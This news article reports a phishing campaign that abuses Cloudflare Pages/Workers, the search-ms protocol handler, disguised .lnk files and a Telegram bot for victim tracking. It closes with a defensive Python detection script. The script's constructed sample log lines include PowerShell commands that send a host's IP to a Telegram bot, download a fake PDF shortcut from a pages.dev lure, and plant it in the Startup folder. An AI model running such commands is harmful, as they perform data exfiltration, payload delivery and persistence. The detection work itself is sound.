A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the abuse of Cloudflare services and Telegram for malicious purposes.
Researchers at Hunt.io have identified this new wave of attacks, which employs Cloudflare-branded phishing pages and advanced tactics to evade detection.
The campaign utilizes Cloudflare’s Pages.dev and Workers.dev platforms, which are normally used for legitimate static website hosting and serverless JavaScript execution, to deliver phishing lures.
These phishing pages impersonate Digital Millennium Copyright Act (DMCA) takedown notices, pressuring victims into downloading malicious files disguised as PDFs.
The attackers abuse the “search-ms” protocol handler to initiate downloads of Windows shortcut (.lnk) files that trigger a malware infection chain when executed.
The phishing lures direct victims to domains hosted on Cloudflare infrastructure, such as “pages.dev” and “workers.dev,” where clicking on a “Get Document” button initiates the infection process.
The malicious .lnk file, disguised as a PDF, executes a PowerShell script that downloads additional payloads from an open directory hosted on a compromised server.
This includes a ZIP archive containing Python-based malware and a legitimate Python executable.
Once extracted, the malware establishes persistence by creating shortcuts in the Windows startup folder and communicates with Pyramid Command-and-Control (C2) servers.
Researchers noted incremental changes in the malware’s delivery mechanism, including obfuscation techniques to frustrate analysis.
For instance, configuration data in the Python script is now encoded with additional junk characters before being decoded.
Despite these modifications, the overall infection logic remains consistent with earlier campaigns linked to the same actor.
A notable evolution in this campaign is the integration of Telegram for victim tracking.
The malware uses a PowerShell script to send the external IP address of infected hosts to an attacker-operated Telegram bot.
This is achieved via hardcoded bot tokens and chat IDs embedded in the script.
The Telegram group associated with this activity, titled “ПШ КОД ЗАПУСК” (translated as “PS CODE LAUNCH”), appears to coordinate operations among several members, including an administrator and bot operator.
Despite their technical sophistication, the attackers continue to exhibit operational security (OPSEC) lapses, such as leaving open directories exposed on their servers.
These directories reveal details about their infrastructure and malware components, enabling researchers to map their activities.
Over 20 domains leveraging these open directories have been identified, further exposing the scale of the operation.
This campaign underscores the abuse of trusted services like Cloudflare and Telegram by cybercriminals to mask their operations and evade detection.
The use of legitimate platforms not only lends credibility to phishing pages but also complicates efforts to identify malicious activity.
Additionally, the exploitation of protocol handlers like “search-ms” highlights gaps in endpoint monitoring that attackers continue to exploit.
Security teams are advised to monitor for signs of abuse involving Cloudflare domains and protocol handlers while remaining vigilant against open directories serving malicious payloads.
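As an added illustration of that advice (example code written for this article, not part of the Hunt.io research), the script below runs simple pattern checks over PowerShell script-block log text for the behaviours described above: a search-ms handler launch, a hardcoded Telegram bot token, a pages.dev/workers.dev lure URL, and a Startup-folder shortcut. The sample log lines and the assumed Telegram token shape (numeric id, colon, long alphanumeric secret) are constructed for this example and are not indicators from the report.

```python
import re

# Detection rules for the techniques the report describes. The token shape and
# the .pages.dev / .workers.dev hostname patterns are assumptions of this example.
RULES = {
    "search_ms_protocol_handler": re.compile(r"\bsearch-ms:", re.IGNORECASE),
    "telegram_bot_api_hardcoded_token": re.compile(
        r"api\.telegram\.org/bot\d{6,}:[A-Za-z0-9_-]{30,}", re.IGNORECASE),
    "cloudflare_dev_hosting_url": re.compile(
        r"https?://[\w.-]+\.(?:pages|workers)\.dev\b", re.IGNORECASE),
    "startup_folder_persistence": re.compile(
        r"Start Menu\\Programs\\Startup", re.IGNORECASE),
}

# Matches the secret half of a bot token so alerts can be shared without leaking it.
TOKEN_RE = re.compile(r"(/bot\d+:)[A-Za-z0-9_-]{30,}")


def redact(block: str) -> str:
    """Mask the Telegram bot secret in a script block before it is reported."""
    return TOKEN_RE.sub(r"\1<redacted>", block)


def scan_script_block(block: str) -> list[str]:
    """Return the names of all rules that fire on one PowerShell script block."""
    return [name for name, rx in RULES.items() if rx.search(block)]


def scan_logs(blocks: list[str]) -> dict[int, dict]:
    """Map block index -> {rules, redacted text} for every block that matched."""
    hits = {}
    for i, block in enumerate(blocks):
        matched = scan_script_block(block)
        if matched:
            hits[i] = {"rules": matched, "text": redact(block)}
    return hits


# Constructed sample script-block log entries (none are real indicators).
SAMPLE_SCRIPT_BLOCKS = [
    "Start-Process 'search-ms:query=document&crumb=location:\\\\example.invalid\\share'",
    "$ip = Invoke-RestMethod 'https://ip.example.invalid'; Invoke-RestMethod -Uri "
    "\"https://api.telegram.org/bot123456789:AAEexampleTOKENexampleTOKENexample01/sendMessage?chat_id=-1001234567890&text=$ip\"",
    "Invoke-WebRequest 'https://example-lure.pages.dev/Get_Document.pdf.lnk' -OutFile $env:TEMP\\doc.lnk",
    "Copy-Item $env:TEMP\\doc.lnk \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\doc.lnk\"",
    "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length",
]

if __name__ == "__main__":
    for idx, hit in scan_logs(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"block {idx}: {', '.join(hit['rules'])}\n    {hit['text']}")
```

Any single rule firing is a triage lead rather than a verdict; the Telegram and search-ms rules in particular are strong signals on hosts where neither is expected.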
Integrating DevOps Security practices can further strengthen detection and response capabilities, especially in monitoring CI/CD pipelines and infrastructure configurations.
Enhanced scrutiny of Telegram-based communications may also aid in identifying emerging threats.
As this threat actor evolves its tactics, organizations must adapt their defenses accordingly to mitigate risks posed by increasingly sophisticated phishing campaigns.